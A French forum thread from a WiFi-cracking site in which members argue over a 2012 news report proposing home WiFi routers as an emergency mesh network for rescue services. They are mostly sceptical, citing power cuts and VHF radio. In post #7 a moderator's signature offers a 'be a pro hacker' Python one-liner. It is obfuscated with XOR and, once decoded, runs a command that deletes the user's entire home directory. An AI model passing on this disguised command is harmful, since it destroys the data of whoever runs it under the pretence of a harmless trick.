Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-08-2012 20:27:21

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Le WiFi comme réseau d'urgence, la Fausse Bonne Idée du jour ?

Cet aprem je suis tombé sur une dépêche AFP qui est relayée un peu partout sur le net, comme elle est courte je vous la reproduis ici :

L'AFP a écrit :

Le wifi pour tous, même pour les secours d'urgence
La démocratisation de l'internet par wifi et des "box" qui équipent de nombreux foyers pourrait, en cas de catastrophe réduisant à néant les réseaux téléphoniques, permettre aux secours de disposer d'un système de télécommunications d'urgence, estiment des chercheurs allemands.

Selon leur expérience, pompiers, policiers et urgentistes pourraient aisément mettre en place un réseau de communication passant par ces "routeurs wifi" qui gèrent directement la connexion entre un ordinateur et internet. Un atout crucial pour sauver des vies lorsqu'un séisme ou un tsunami a détruit les lignes et les antennes de téléphonie mobile, ou que celles-ci sont tout simplement saturées par des appels de détresse.

Kamill Panitzek et ses collègues de l'Université technique de Darmstadt, dans l'ouest de l'Allemagne, ont marché dans les rues de leur centre-ville avec un logiciel destiné à repérer de tels routeurs wifi. Sur une surface de seulement un demi kilomètre carré, ils ont détecté 1.971 routeurs, dont 212 publics et donc non cryptés.

Pour eux, le réseau est tellement dense qu'il pourrait accueillir les communications des équipes de secours et leur permettre de rester en contact avec leur quartier-général ou entre elles.

"Avec une portée de 30 mètres, on pourrait facilement construire un maillage en réseau dans des zones urbaines semblables à notre ville", explique l'équipe de Darmstadt (142.000 habitants) qui publie lundi son modèle mathématique dans la revue International Journal of Mobile Network Design and Innovation.

Pour les chercheurs, les routeurs pourraient ainsi être équipés d'office d'une sorte d'"interrupteur d'urgence" que les secours activeraient en cas de besoin.

Une telle technique ne nuirait pas aux performances des utilisateurs et respecterait leur vie privée, assure l'étude. De nombreuses "box" sont déjà dotées d'un mode "invité", un canal supplémentaire qui permet aux visiteurs d'utiliser le wifi de leurs hôtes sans intrusion, notent les auteurs.

"L'interrupteur autoriserait un mode +invité+ ouvert, qui garantirait la vie privée des gens tout en laissant les secours d'urgence accéder aux ressources du routeur", résume l'étude.

Source --> Le wifi pour tous, même pour les secours d'urgence [actu.orange.fr] (entre autre)

Maintenant, je voudrais savoir ce que vous en pensez. Personnellement je suis assez sceptique, j'ai presque envie de crier "BULLSHIT !" mais restons courtois.
Je m'explique :
- Si les lignes téléphoniques et cellulaires sont coupées, les box des abonnés n'ont pas accès au réseau non plus et le réseau WiFi ainsi isolé ne sert à rien
- Le "maillage" proposé par les chercheurs ne peut pas être réalisé avec du matériel standard, il faut qu'il soit programmé pour pouvoir faire du Mesh et je peux vous assurer que ça c'est pas encore au point. On y arrive mais c'est encore 'achement expérimental (cfr. BattleMesh ou des joyeux bidouilleurs s'affrontent pour avoir le meilleur protocole).
- Leur idée d'imposer d'office un bouton sur chaque box pour créer un réseau "invité/ouvert", par contre, je dis non... Permettre à n'importe qui de créer un réseau "guest" sur n'importe quelle box, pour moi ça relève de la faille de sécurité. A moins que ça soit TRÈS bien conçu derrière (VPN, réseau séparé,...), et même là encore j'ai des doutes...

Finalement leur seule conclusion c'est qu'il y a des réseaux WiFi un peu partout et qu'il y en a encore plein qui ne sont pas sécurisés, mais ça on le savait déjà... De là à dire (comme certains l'ont titré) que "Votre WiFi va sauver des vies", y a encore du chemin ! big_smile

Surtout que dans ce genre de situation de crise, les services de secours peuvent rapidement déployer quelques radios VHF pour couvrir une plus grande distance avec moins d'émetteurs, pas besoin de se compliquer à créer du mesh sur WiFi pour ça. Sans oublier que le WiFi est fondamentalement mauvais pour ça (fréquence élevée donc portée limitée et mauvais comportement en milieu urbain).

Mais bon, comme je suis quelqu'un de posé et d'ouvert d'esprit (la modestie, tout ça...) je voulais savoir ce que vous en pensiez : Fausse Bonne Idée ou bien c'est juste moi qui suis pessimiste et qui vois le mal partout ? A vos boîtiers ! smile

Dernière modification par antares145 (20-08-2012 20:29:26)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 20-08-2012 22:01:30

Caracole
Membre Actif
Inscription : 20-08-2011
Messages : 43

Re : Le WiFi comme réseau d'urgence, la Fausse Bonne Idée du jour ?

D'après ce que j'ai lu, et compris, à propos de l'histoire de l'interrupteur invité/ouvert, c'est qu'il ne serait accessible seulement pour les secours, en cas d'urgence. A partir de cela, est-ce que ce même interrupteur permettrait à n'importe qui de créer un réseau "guest" sur n'importe quelle box, je ne crois pas que ce soit ce que l'étude montre. Cependant, on peut se poser des questions : pour cet interrupteur d'urgence, comment faire en sorte que ce soit utilisé seulement par les secours ? Et comment vont-ils faire pour activer le mode d'urgence, à distance, sur le routeur ? C'est assez louche.

Après, pour l'histoire du maillage réseau, ça a l'air d'être une bonne idée sur le papier, mais ça doit prendre un certain temps pour le mettre en place, non ? Et d'après ce que tu dis antares, ça n'a pas l'air d'être très au point. Si en cas d'urgence le système n'est ni efficace, ni fiable, laisse tomber...

Je suis assez sceptique sur l'idée, qui n'est pas mauvaise en soi, mais ça manque de recul, on dirait qu'il n'ont pas pensé aux problèmes et inconvéniants que le projet pose. Après ils n'ont peut-être pas mentionné tous les termes de l'étude en question.

Hors Ligne

#3 20-08-2012 22:09:03

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Le WiFi comme réseau d'urgence, la Fausse Bonne Idée du jour ?

Pas convaincu non plus... en cas de seisme ou de tsunami il y aura des coupures électriques, il suffit que la coupure se passe dans deux trois pâtés de maison pour réduire à néant le maillage sur toute une partie de la ville.
D'ailleurs en cas de gros pépin ce serait la zone la plus sinistrée qui serait la première à être coupée du reste de la red.
Ça me semble très mal vu ou il y a quelque chose qui m'échappe...

Hors Ligne

#4 20-08-2012 23:09:33

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le WiFi comme réseau d'urgence, la Fausse Bonne Idée du jour ?

Je ne suis pas parano mais si vous voulez mon avis c'est encore un moyen déguisé de nous la mettre a l'envers...

Pourquoi employé une allumette pour s'allumer une clope plutot qu'un briquer?

Big Brother is Watching You tongue

Dernière modification par koala (20-08-2012 23:09:49)

Hors Ligne

#5 20-08-2012 23:54:46

Caracole
Membre Actif
Inscription : 20-08-2011
Messages : 43

Re : Le WiFi comme réseau d'urgence, la Fausse Bonne Idée du jour ?

Boaf, on parle d'une étude faite par des chercheurs d'une université allemande, pas d'un projet comme INDECT. tongue
Après on sait jamais ça peut toujours tomber entre de mauvaises mains...

Hors Ligne

#6 21-08-2012 01:25:08

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Le WiFi comme réseau d'urgence, la Fausse Bonne Idée du jour ?

Ce sont des recherches que je qualifiais de pas vraiment nécessaire, comme tu dis antares145 les communications radio VHF permettent d'assurer les liaisons ainsi comme le rappelle kcdtv une coupure de courant va arrêter toutes les boxs. 

antares145 a écrit :

Leur idée d'imposer d'office un bouton sur chaque box pour créer un réseau "invité/ouvert", par contre, je dis non... Permettre à n'importe qui de créer un réseau "guest" sur n'importe quelle box, pour moi ça relève de la faille de sécurité. A moins que ça soit TRÈS bien conçu derrière (VPN, réseau séparé,...), et même là encore j'ai des doutes...

Je crois que ça existe déjà sur les boxs Free de dernière génération comme je l'ai mentionné ici sinon j'avais pas très bien compris et j'aurais dit une connerie.

Hors Ligne

#7 21-08-2012 13:34:01

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : Le WiFi comme réseau d'urgence, la Fausse Bonne Idée du jour ?

Bof, un mode réseau mesh spécial coupure de réseau caché dans toutes les box peut être sympathique en effet.
Cela dit, les pompiers n'ont pas besoin de ça pour communiquer.
Si problème il y a, ce n'est pas la solution.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#8 21-08-2012 13:50:01

Tahos
Membre Actif
Inscription : 08-07-2012
Messages : 27

Re : Le WiFi comme réseau d'urgence, la Fausse Bonne Idée du jour ?

Je partage vos opinions. Ca m'a l'air chiant à mettre en place. Et comme dit précédemment, si y'a un tsunami qui passe sur ta maison, généralement, ta livebox elle pète pas la forme après. lol
A mon avis, outre l'aspect sécurité du réseau, ça peut surtout compromettre le bon déroulement d'une opération de sauvetage qui compterait un peu trop sur le bon fonctionnement des box pour communiquer.


Vous savez, moi je ne crois pas qu'il y ait de bonnes ou de mauvaises situations ...

Hors Ligne

#9 21-08-2012 23:09:33

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Le WiFi comme réseau d'urgence, la Fausse Bonne Idée du jour ?

kcdtv a écrit :

en cas de seisme ou de tsunami il y aura des coupures électriques, il suffit que la coupure se passe dans deux trois pâtés de maison pour réduire à néant le maillage sur toute une partie de la ville.
D'ailleurs en cas de gros pépin ce serait la zone la plus sinistrée qui serait la première à être coupée du reste de la red.

+1, j'avais pas pensé à ça en plus

Caracole a écrit :

Boaf, on parle d'une étude faite par des chercheurs d'une université allemande, pas d'un projet comme INDECT.

Tu serais surpris du nombre de bonnes idées et concepts intéressants qui sont récupérés pour faire de la m*rde roll Si c'est implémenté, ça SERA détourné de son but initial, par les gentils ou les méchants (je vous laisse choisir dans quelle catégorie vous mettez nos officiels)

Fuji a écrit :

Je crois que ça existe déjà sur les boxs Free de dernière génération comme je l'ai mentionné ici sinon j'avais pas très bien compris et j'aurais dit une connerie.

Ah, j'avais pas pensé à ce genre de possibilité tiens, comme quoi smile Moi je m'étais focalisé sur le switch physique que les services de secours activent (ou demandent d'activer), mais c'est vrai qu'une authentification par SIM reste jouable. Bon, ça serait une ch*erie à configurer/régler/déployer, et ça obligerait les pompiers & autres à avoir un smartphone comme terminal de secours (mouarf !), mais le problème de l'accès peut se résoudre comme ça smile
PS : tu veux plus de détails sur l'EAP-SIM et l'absence de handshake sur ton autre topic ?

Tahos a écrit :

A mon avis, outre l'aspect sécurité du réseau, ça peut surtout compromettre le bon déroulement d'une opération de sauvetage qui compterait un peu trop sur le bon fonctionnement des box pour communiquer.

<Le meilleur moyen de transformer une catastrophe en désastre, c'est de perdre les communications> (je sais plus qui a dit ça, mais je l'ai lu sur le site de radio-amateurs qui assurent un réseau d'urgence en coppération avec les services concernés) smile

Koala : je pense pas que le but du chercheur à la base soit de nous fourguer un canal d'espionnage généralisé, mais j'en connais qui vont s'empresser de la reprendre pour justifier un mode OPN sur toutes les box (la censure contre la pédophilie, tout ça...)

Hors Ligne

#10 22-08-2012 04:31:50

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Le WiFi comme réseau d'urgence, la Fausse Bonne Idée du jour ?

antares145 a écrit :

PS : tu veux plus de détails sur l'EAP-SIM et l'absence de handshake sur ton autre topic ?

Yes smile

Dernière modification par Fuji (22-08-2012 04:32:12)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Quelle carte wifi choisir ? par Morpheus_Dotcom
2 125 05-12-2016 15:11:00 par Morpheus_Dotcom
8 307 17-11-2016 12:02:17 par koala
0 287 22-10-2016 19:03:48 par Antho3674
6 4781 05-10-2016 10:26:24 par X-Ecutioner
9 916 28-09-2016 11:33:08 par damsss

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]